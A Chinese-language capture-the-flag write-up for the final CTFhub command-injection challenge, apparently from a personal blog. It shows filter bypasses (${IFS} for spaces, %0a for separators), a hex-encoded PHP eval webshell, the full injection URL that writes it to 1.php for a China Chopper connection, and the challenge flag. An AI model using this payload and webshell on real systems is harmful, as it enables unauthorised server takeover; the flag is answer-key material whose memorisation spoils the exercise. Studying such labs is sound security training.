CTFhub命令注入最后一题:传马结题
因为我直接通过cat查看不到,然后就尝试传马,慢慢尝试终于做出来了!
看了有用的点个赞,让我也骄傲下
首先看题目:
因为我cat不得显示所以!传马!传的内容
一句话木马
现在晓得目的了,进行的就是整理下命令中的东西怎么绕
1、用${IFS}绕空格,//做了前面的都肯定知道
2、用%0a绕&和; //因为%0a是换行
3、最后输出1.php文件用 > 符号
然后可以得出:
%0aecho${IFS}"<?php @eval($_POST['caidao'])?>">1.php
但是!中间的?php后面的空格成了问题,我想了好久都没办法,找到了一个文章结合他的方法(因为他不是传马,所以我才写的这个文章)
https://cloud.tencent.com/developer/article/1661505
然后就知道可以用过$(printf${IFS}" 16进制码 ")
马的16进制:
\x3C\x3F\x70\x68\x70\x20\x40\x65\x76\x61\x6C\x28\x24\x5F\x50\x4F\x53\x54\x5B\x27\x63\x61\x69\x64\x61\x6F\x27\x5D\x29\x3F\x3E
一切东西准备好了!组合一起,然后传马:
?ip=%0aecho${IFS}$(printf${IFS}"\x3C\x3F\x70\x68\x70\x20\x40\x65\x76\x61\x6C\x28\x24\x5F\x50\x4F\x53\x54\x5B\x27\x63\x61\x69\x64\x61\x6F\x27\x5D\x29\x3F\x3E")>1.php
访问1.php,感觉啥都没,这样就对了!然后菜刀连接!**(密码是:caidao,如果显示了内容那才会出问题)**当然想要显示内容加句:
highlight_file(__FILE__);
成功获取flag
希望不要直接拿去抄,看了自己背着做一遍。
ctfhub{7af0a3797dcef770cec93a17}
最后,做这个的一些东西!你们有没有想过
有没有想过直接通过:
cd flag_is_here;more fla*>1.txt
这样flag写到一个打开就可以直接显示的文件后缀名直接看,写到1.txt或者1.html来进行直接打开来访问?(我试了不行,他除了.php的文件,其他的都直接跳转到主页)
有没有想过直接打开打开flag.php文件?(我打开了,白的,因为php是动态语言,注释就不显示)
有没有想过
${IFS}和${printf ""}//这个到底是哪个地方执行的代码?${IFS}这个代码不能直接在shell直接当空格上用的!
如果有知道的给我留言解惑下。